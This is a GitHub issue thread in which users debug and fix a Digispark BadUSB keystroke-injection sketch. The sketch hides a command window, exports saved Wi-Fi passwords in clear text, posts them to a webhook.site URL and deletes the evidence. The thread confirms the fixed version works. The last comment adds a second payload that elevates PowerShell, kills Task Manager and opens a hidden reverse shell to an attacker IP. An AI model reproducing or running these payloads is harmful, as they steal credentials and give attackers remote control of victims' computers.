### ISSUE TITLE
Issue with Creating the file

### ISSUE THREAD

**Issue by Apollo-config** [MTK911/Attiny85#3]
Hello I have an error with creating the file with a content could you clarify that it works on the new windows 10 version. I seem to be able to create the file but there is no content is in the file and it wont upload to the Webhook website unless i change it to a .txt file 

/*
  Following payload will grab saved Wifi password and will send them to your hosted webhook.
*/

#include "DigiKeyboard.h"

void setup() {
  pinMode(1, OUTPUT); //LED on Model A 
}

void loop() {
   
  DigiKeyboard.update();
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(3000);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //start run
  DigiKeyboard.delay(100);
  DigiKeyboard.println("cmd /k mode con: cols=15 lines=1"); //smallest cmd window possible for trying to making it as less noticeable as possible
  DigiKeyboard.delay(500);
  DigiKeyboard.println("cd %temp%"); //Jumping to temporary dir
  DigiKeyboard.delay(300);  
  DigiKeyboard.println("netsh wlan export profile key=clear"); //grabbing all the saved wifi passwd and saving them in temporary dir
  DigiKeyboard.delay(500);  
  DigiKeyboard.println("powershell Select-String -Path Wi-Fi-PASS.txt -Pattern 'keyMaterial' > Wi-Fi-PASS.txt"); //Extracting all password and saving them in Wi-Fi-Pass file in temporary dir
  DigiKeyboard.delay(500);  
  DigiKeyboard.println("powershell Invoke-WebRequest -Uri https://webhook.site/<WEBHOOK WEBSITE> -Method POST -InFile Wi-Fi-PASS.txt"); //Submitting all passwords on hook
  DigiKeyboard.delay(1000);  
  DigiKeyboard.println("del Wi-Fi-* /s /f /q"); //cleaning up all the mess
  DigiKeyboard.delay(500);  
  DigiKeyboard.println("exit");
  DigiKeyboard.delay(100);  
  digitalWrite(1, HIGH); //turn on led when program finishes
  DigiKeyboard.delay(90000);
  digitalWrite(1, LOW); 
  DigiKeyboard.delay(5000);
  
}

**Comment by MTK911** [comment]
Hey Apollo,

Sorry for delayed response it slipped my mind last week. I did looked into the code you shared and tried it on Windows 10 latest version it is not working and problem is that you are missing a single character from the script here and replaced it with .txt;

`DigiKeyboard.println("powershell Select-String -Path Wi-Fi-PASS.txt -Pattern 'keyMaterial' > Wi-Fi-PASS.txt"); `
What this part is doing is, it is telling powershell to select a filename Wi-Fi-PASS.txt and search of word 'keyMaterial' and transfer it to Wi-Fi-PASS.txt. 

Normally when you run this command:
`netsh wlan export profile key=clear` 
It will generate XML files with name "Wi-Fi-<YourWiFi-Name>.xml" These files contain password but they are separated in different files so we transfer all the passwords into a single file so we can send them all in a single request using this;

`powershell Select-String -Path Wi-Fi-* -Pattern 'keyMaterial' > Wi-Fi-PASS`
Here we are telling powershell to look for a string 'keyMaterial' in file Wi-Fi-* where * will be wildcard which will be helpful in searching all the files starting with name Wi-Fi- and using this we will save all the passwords into a single file and in next step we will send post request to webhook.site and will save all the passwords.

I hope this will help just change the following line and everything will work fine;
`DigiKeyboard.println("powershell Select-String -Path Wi-Fi-* -Pattern 'keyMaterial' > Wi-Fi-PASS");`

Regards,
MTK

**Comment by Apollo-config** [comment]
Hello MTK, 

I seem to have a problem with the file having anything in it when it sends to the web-hook address. Can you suggest any other Problems wrong with the code.

Many thanks, 


********************************************************** CODE

/*
Following payload will grab saved Wifi password and will send them to your hosted webhook.
*/

#include "DigiKeyboard.h"

void setup() {
pinMode(1, OUTPUT); //LED on Model A
}

void loop() {

DigiKeyboard.update();
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(3000);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //start run
DigiKeyboard.delay(100);
DigiKeyboard.println("cmd /k mode con: cols=15 lines=1"); //smallest cmd window possible for trying to making it as less noticeable as possible
DigiKeyboard.delay(500);
DigiKeyboard.println("cd %temp%"); //Jumping to temporary dir
DigiKeyboard.delay(300);
DigiKeyboard.println("netsh wlan export profile key=clear"); //grabbing all the saved wifi passwd and saving them in temporary dir
DigiKeyboard.delay(500);
DigiKeyboard.println("powershell Select-String -Path Wi-Fi-PASS.txt -Pattern 'keyMaterial' > Wi-Fi-PASS.txt");  //Extracting all password and saving them in Wi-Fi-Pass file in temporary dir
DigiKeyboard.delay(500);
DigiKeyboard.println("powershell Invoke-WebRequest -Uri https://webhook.site/e627b2d0-c4cd-4015-ab33-eadde242054b -Method POST -InFile Wi-Fi-PASS.txt"); //Submitting all passwords on hook
DigiKeyboard.delay(1000);
DigiKeyboard.println("del Wi-Fi-* /s /f /q"); //cleaning up all the mess
DigiKeyboard.delay(500);
DigiKeyboard.println("exit");
DigiKeyboard.delay(100);
digitalWrite(1, HIGH); //turn on led when program finishes
DigiKeyboard.delay(90000);
digitalWrite(1, LOW);
DigiKeyboard.delay(5000);

}

**Comment by MTK911** [comment]
Hi,
Yes, the problem is still the same you didn't changed the line i asked you todo. For your easy use the following code:

```
#include "DigiKeyboard.h"

void setup() {
  pinMode(1, OUTPUT); 
}

void loop() {
   
  DigiKeyboard.update();
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(3000);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(100);
  DigiKeyboard.println("cmd /k mode con: cols=15 lines=1"); 
  DigiKeyboard.delay(500);
  DigiKeyboard.println("cd %temp%"); 
  DigiKeyboard.delay(300);  
  DigiKeyboard.println("netsh wlan export profile key=clear");
  DigiKeyboard.delay(500);  
  DigiKeyboard.println("powershell Select-String -Path Wi-Fi-* -Pattern 'keyMaterial' > Wi-Fi-PASS"); 
  DigiKeyboard.delay(500);  
  DigiKeyboard.println("powershell Invoke-WebRequest -Uri https://webhook.site/e627b2d0-c4cd-4015-ab33-eadde242054b -Method POST -InFile Wi-Fi-PASS"); 
  DigiKeyboard.delay(1000);  
  DigiKeyboard.println("del Wi-Fi-* /s /f /q"); 
  DigiKeyboard.delay(500);  
  DigiKeyboard.println("exit");
  DigiKeyboard.delay(100);  
  digitalWrite(1, HIGH);
  DigiKeyboard.delay(90000);
  digitalWrite(1, LOW); 
  DigiKeyboard.delay(5000);
  
}
```

**Comment by Apollo-config** [comment]
Hello,

Changed the code here's the result, it sends to the link but doesn't have anything in it 

![image](https://user-images.githubusercontent.com/41553921/57193675-b6109280-6f35-11e9-920f-86b2da343dca.png)

**Comment by MTK911** [comment]
To check the issue please do the following:

1. Open CMD
2. Goto Desktop in CMD
3. Type following `netsh wlan export profile key=clear`
4. Than `powershell Select-String -Path Wi-Fi-* -Pattern 'keyMaterial' > Wi-Fi-PASS`
5. Than `powershell Invoke-WebRequest -Uri https://webhook.site/e627b2d0-c4cd-4015-ab33-eadde242054b -Method POST -InFile Wi-Fi-PASS`

6. Go to your desktop and look if there are some new xml files with password and a file with name Wi-Fi-PASS. 

Return back with results.

**Comment by Apollo-config** [comment]
Hello, 

I have typed in the code you sent and the result is the same i get a request through to the website but the file is blank. there is no information stored in the page but the commands complete without failing.
![image](https://user-images.githubusercontent.com/41553921/57193828-7ea2e580-6f37-11e9-91a0-aaf7e1e0510e.png)

![image](https://user-images.githubusercontent.com/41553921/57193841-99755a00-6f37-11e9-9b21-70a929c3e549.png)

**Comment by MTK911** [comment]
Please make sure of the following:

1. You have a Wi-Fi password stored in your connection
2. You have admin privileges on account you are trying to run the command on.
3. Please check did you got any xml files in your "C:\Users\georg" dir

**Comment by Apollo-config** [comment]
1. definitely passwords are stored in my connection
2. The account i am using is an administrator account 
3. the files are located in the C:\Users\georg dir

**Comment by MTK911** [comment]
Sorry to say but this beyond my understanding. I am keeping this issue open until someone else will take it on.

P.S: It is working on my side.

**Comment by Ocor17** [comment]
Better late than never but I may have found a solution as I had this same issue. I'm not entirely sure why it would have failed but I'm guessing that some systems do not output the xml as Wi-Fi- but rather Wi-Fi  with a space instead of dash. I instead searched through files with the .xml extension and everything worked for me.
`  DigiKeyboard.println("powershell Select-String -Path *.xml -Pattern 'keyMaterial' > Wi-Fi-PASS");
`

Hope this helps anyone else who may have this issue.

**Comment by MTK911** [comment]
Thanks @Ocor17 for the solution.
For safe side I think it would be better if we use `Wi-*.xml` as there can be other XML files in place and it will only cause extra delay which might break the sequence since there is only limited time frame.
I am updating the script to use:
`DigiKeyboard.println("powershell Select-String -Path Wi-*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS");`
If possible can you verify updated script on your side which I would very much appreciated. Thanks again

**Comment by Ocor17** [comment]
Can confirm the script works on my side with the updated script

**Comment by MTK911** [comment]
Thank you @Ocor17  issue is now marked as closed

**Comment by RedHatPentester** [comment]
Hi MK, the install shell. I always get erros when compiling script with Ardruino. Kindly assist

**Comment by RedHatPentester** [comment]
Hi Khan. 

I have errors while compiling this code in Ardruino. Kindly assist: 

#include "DigiKeyboard.h"
#define KEY_TAB 0x2b
void setup() {
  pinMode(1, OUTPUT); //LED on Model A
}
void loop() {
  DigiKeyboard.update();
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(3000);

  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //run
  DigiKeyboard.delay(500);
  DigiKeyboard.println("taskmgr"); //starting taskmgr
  DigiKeyboard.delay(5000);
  DigiKeyboard.sendKeyStroke(KEY_F, MOD_ALT_LEFT);
  DigiKeyboard.sendKeyStroke(KEY_N);//run
  DigiKeyboard.delay(2000);
  DigiKeyboard.print("powershell -noexit -command \"mode con cols=18 lines=1\"");//start tiny PowerShell
  DigiKeyboard.sendKeyStroke(KEY_TAB);
  DigiKeyboard.sendKeyStroke(KEY_SPACE);//turn on admin privileges
  DigiKeyboard.sendKeyStroke(KEY_ENTER); //run
  DigiKeyboard.delay(5000);
  DigiKeyboard.println("taskkill /IM \"taskmgr.exe\" /F ");//killing taskmanager
  DigiKeyboard.delay(2000);
  DigiKeyboard.println("cmd");//run cmd
  DigiKeyboard.delay(2000);
  DigiKeyboard.println(F("powershell -windowstyle hidden -command \"$client = New-Object System.Net.Sockets.TCPClient('<YOUR_IP_ADDRESS>',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"")); //powershell to attacker
  DigiKeyboard.delay(5000);
  digitalWrite(1, HIGH); //turn on led when program finishes
  DigiKeyboard.delay(90000);
  digitalWrite(1, LOW);
  DigiKeyboard.delay(5000);
